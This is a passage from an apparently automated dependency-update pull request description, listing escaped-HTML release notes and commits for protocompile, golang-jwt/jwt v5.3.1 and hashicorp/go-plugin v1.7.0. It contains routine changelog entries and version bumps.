href=\"https://redirect.github.com/bufbuild/protocompile/issues/310\"\u003e#310\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate linker tests to use \u003ccode\u003eprotodesc\u003c/code\u003e to create descriptors from compilation results, to verify compilation results can be correctly processed by protobuf-go runtime in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/302\"\u003e#302\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd another (missing) test case for extension declarations in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/304\"\u003e#304\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.13.0...v0.14.0\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.13.0...v0.14.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eThis release includes a single addition to the \u003ccode\u003eprotocompile.Compiler\u003c/code\u003e type.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eProvide ability for caller to seed/re-use symbol table across compile jobs by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/294\"\u003e#294\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.12.0...v0.13.0\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.12.0...v0.13.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eThis release mostly contains performance improvements. It also includes an addition that makes it possible to implement a descriptor resolver on top of \u003ccode\u003elinker.Files\u003c/code\u003e much more efficiently, using a \u003ccode\u003e*linker.Symbols\u003c/code\u003e as an index.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd lookup methods to \u003ccode\u003e*linker.Symbols\u003c/code\u003e by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/286\"\u003e#286\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVarious performance improvements (mostly reducing allocations) in the linker by \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/286\"\u003e#286\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/287\"\u003e#287\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/290\"\u003e#290\u003c/a\u003e, and \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/291\"\u003e#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/4082cf0effa602efd1a38af1d586cfa8b56a7ae2\"\u003e\u003ccode\u003e4082cf0\u003c/code\u003e\u003c/a\u003e Bump github.com/golangci/golangci-lint from 1.60.0 to 1.60.1 in /internal/too...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/6953ab0b4fca6df5f5a2791a23d05edd3667c2ff\"\u003e\u003ccode\u003e6953ab0\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.36.0 to 1.37.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/0142a0715e5fc3929c67a99e0a0534a4d11b4a8d\"\u003e\u003ccode\u003e0142a07\u003c/code\u003e\u003c/a\u003e Fix panic that can occur when interpreting options in lenient mode (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/331\"\u003e#331\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/0de629aa798dad864d819111004e9648128b15d9\"\u003e\u003ccode\u003e0de629a\u003c/code\u003e\u003c/a\u003e Update to go1.21 and golangci 1.60.0, test with go1.23 (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/330\"\u003e#330\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/245c11dc13a84705c8b26147086bb79cd01720d3\"\u003e\u003ccode\u003e245c11d\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/tools from 0.23.0 to 0.24.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/8bd6667a27e36b7052d3e1622e9c68eac7487385\"\u003e\u003ccode\u003e8bd6667\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.35.1 to 1.36.0 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/329\"\u003e#329\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/1c0714018e4cbc9957dd0712941b10ee7095a8a8\"\u003e\u003ccode\u003e1c07140\u003c/code\u003e\u003c/a\u003e Allow reserved extension declaration to specify full_name and type as long as...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/cab89429889f2a8697bcf70bf9470bd2d7ed9c81\"\u003e\u003ccode\u003ecab8942\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/sync from 0.7.0 to 0.8.0 in /internal/benchmarks (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/326\"\u003e#326\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/66f98f35c033bb5616b217515cb72562d3a3851a\"\u003e\u003ccode\u003e66f98f3\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/sync from 0.7.0 to 0.8.0 (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protocompile/commit/00a0cbd6a0d9c43e16a7c20ea0bac515a0269e9e\"\u003e\u003ccode\u003e00a0cbd\u003c/code\u003e\u003c/a\u003e Bump github.com/bufbuild/buf from 1.34.0 to 1.35.1 in /internal/tools (\u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.4.0...v0.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/golang-jwt/jwt/v5` from 5.3.0 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/golang-jwt/jwt/releases\"\u003egithub.com/golang-jwt/jwt/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.3.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003e🔐 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd spellcheck Github action to catch common spelling mistakes by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eWithNotBeforeRequired\u003c/code\u003e parser option and add test coverage by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/456\"\u003egolang-jwt/jwt#456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate godoc example func to properly refer to \u003ccode\u003eNewWithClaims()\u003c/code\u003e by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/459\"\u003egolang-jwt/jwt#459\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate github workflows by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/462\"\u003egolang-jwt/jwt#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdditional test for CustomClaims that validates unmarshalling behaviour by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/457\"\u003egolang-jwt/jwt#457\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix early file close in jwt cli by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/472\"\u003egolang-jwt/jwt#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd TPM signature reference by \u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove misleading ParserOptions documentation in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/484\"\u003egolang-jwt/jwt#484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSave signature to Token struct after successful signing by \u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e by \u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e👒 Dependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump crate-ci/typos from 1.34.0 to 1.35.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/461\"\u003egolang-jwt/jwt#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.35.4 to 1.36.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/470\"\u003egolang-jwt/jwt#470\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/478\"\u003egolang-jwt/jwt#478\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.36.2 to 1.39.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/480\"\u003egolang-jwt/jwt#480\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golangci/golangci-lint-action from 8 to 9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/481\"\u003egolang-jwt/jwt#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/469\"\u003egolang-jwt/jwt#469\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.39.0 to 1.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/488\"\u003egolang-jwt/jwt#488\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/487\"\u003egolang-jwt/jwt#487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.40.0 to 1.41.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/490\"\u003egolang-jwt/jwt#490\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.41.0 to 1.42.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/492\"\u003egolang-jwt/jwt#492\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ehttps://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/7ceae619e739dc8a7bf577214aa8ebf26668e9db\"\u003e\u003ccode\u003e7ceae61\u003c/code\u003e\u003c/a\u003e Add release.yml for changelog configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/dce8e4dddcc9dc812cdc0b9d2037512d0e4b3eb5\"\u003e\u003ccode\u003edce8e4d\u003c/code\u003e\u003c/a\u003e Set token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/414\"\u003e#414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/8889e208aa5c3736e5f7a856107ee70c046b803e\"\u003e\u003ccode\u003e8889e20\u003c/code\u003e\u003c/a\u003e Save signature to Token struct after successful signing (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/417\"\u003e#417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d237f8204b397bc008b5b07c4e081beb4ec2a7b1\"\u003e\u003ccode\u003ed237f82\u003c/code\u003e\u003c/a\u003e ci: update github-actions schedule interval to monthly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d8dce95a406fc435aa3d11c5073f2f31a9449116\"\u003e\u003ccode\u003ed8dce95\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.41.0 to 1.42.1 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/492\"\u003e#492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e93180329eab078116176ff7dc4352760bc5f290\"\u003e\u003ccode\u003ee931803\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.40.0 to 1.41.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/490\"\u003e#490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e6a0afa839d74787501369217245b52bfc75f30d\"\u003e\u003ccode\u003ee6a0afa\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/9f85c9ec9f10fb6919d773cb8df07029639ec76e\"\u003e\u003ccode\u003e9f85c9e\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.39.0 to 1.40.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/60a8669e0221aed55a6abfd9b5cd20472f0c6ebd\"\u003e\u003ccode\u003e60a8669\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/469\"\u003e#469\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/76f582896da76978896d59ced995d7967c33c434\"\u003e\u003ccode\u003e76f5828\u003c/code\u003e\u003c/a\u003e Remove misleading ParserOptions documentation (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/hashicorp/go-plugin` from 1.6.3 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/releases\"\u003egithub.com/hashicorp/go-plugin's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrint panic output on Error log level by \u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSpend less time preparing to write log lines when the logger is disabled by \u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eComplete the implementation of moving panics to the Error log level by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/353\"\u003ehashicorp/go-plugin#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate changelog for v1.7.0 by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/356\"\u003ehashicorp/go-plugin#356\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaushikiAnand\"\u003e\u003ccode\u003e@​KaushikiAnand\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/335\"\u003ehashicorp/go-plugin#335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dduzgun-security\"\u003e\u003ccode\u003e@​dduzgun-security\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/337\"\u003ehashicorp/go-plugin#337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhijeetviswa\"\u003e\u003ccode\u003e@​abhijeetviswa\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/342\"\u003ehashicorp/go-plugin#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/compliance-pr-automation-bot\"\u003e\u003ccode\u003e@​compliance-pr-automation-bot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/350\"\u003ehashicorp/go-plugin#350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ehttps://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/blob/main/CHANGELOG.md\"\u003egithub.com/hashicorp/go-plugin's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhen go-plugin encounters a stack trace on the server stderr stream, it now raises output to a log-level of Error instead of Debug. [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003eGH-292\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't spend resources parsing log lines when logging is disabled [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003eGH-352\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for gRPC dial options to the \u003ccode\u003eDial\u003c/code\u003e API [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/257\"\u003eGH-257\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where reattaching to a plugin that exits could kill an unrelated process [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/320\"\u003eGH-320\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.1\u003c/h2\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress spurious \u003ccode\u003eos.ErrClosed\u003c/code\u003e on plugin shutdown [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/299\"\u003eGH-299\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bump google.golang.org/grpc to v1.58.3 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/296\"\u003eGH-296\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eplugin: Plugins written in other languages can optionally start to advertise whether they support gRPC broker multiplexing.\nIf the environment variable \u003ccode\u003ePLUGIN_MULTIPLEX_GRPC\u003c/code\u003e is set, it is safe to include a seventh field containing a boolean\nvalue in the \u003ccode\u003e|\u003c/code\u003e-separated protocol negotiation line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSupport muxing gRPC broker connections over a single listener [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/288\"\u003eGH-288\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eclient: Configurable buffer size for reading plugin log lines [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/265\"\u003eGH-265\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebuf\u003c/code\u003e for proto generation [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/286\"\u003eGH-286\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/net to v0.17.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/sys to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/text to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.5.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 